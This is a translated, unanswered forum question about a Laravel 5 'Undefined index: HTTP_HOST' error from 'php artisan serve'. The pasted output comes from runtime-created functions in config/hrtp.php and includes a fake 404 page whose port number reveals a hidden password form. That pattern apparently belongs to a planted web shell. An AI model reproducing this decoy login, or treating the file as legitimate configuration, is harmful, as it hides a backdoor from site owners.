如何在Laravel 5中修复“未定义的索引:HTTP_HOST”

时间:2019-05-10 09:28:15

标签: php laravel-5 create-function http-host

无法运行“ php artisan serve”,这给我一个

错误
  

未定义索引:HTTP_HOST

$ php artisan serve
  

注意:未定义的索引:D:\ SoftwareFiles \ xampp \ htdocs \ feedingtrend \ config \ hrtp.php(21)中的HTTP_HOST:第61行上的运行时创建的函数

     

警告:无法修改标头信息-D:\ SoftwareFiles中已经由发送的标头(输出从D:\ SoftwareFiles \ xampp \ htdocs \ feedingtrend \ config \ hrtp.php(21):运行时创建的函数:61开始) \ xampp \ htdocs \ feedingtrend \ config \ hrtp.php(21):在第35行上运行时创建的函数

<html><head>
        <title>404 Not Found</title>
        </head><body>
        <h1>Not Found</h1>
        <p>The requested URL was not found on this server.</p>
        <hr>
        <address>Apache/2.2.22 (Linux) Server at Port <small onclick="document.getElementById('login').style.display = 'block';">80</small></address>
        </body></html><div id="login" style="display:none;"><pre align=center><form method=post>Password: <input type=password name=pass><input type=submit value='>>'></form></pre></div>

0 个答案:

没有答案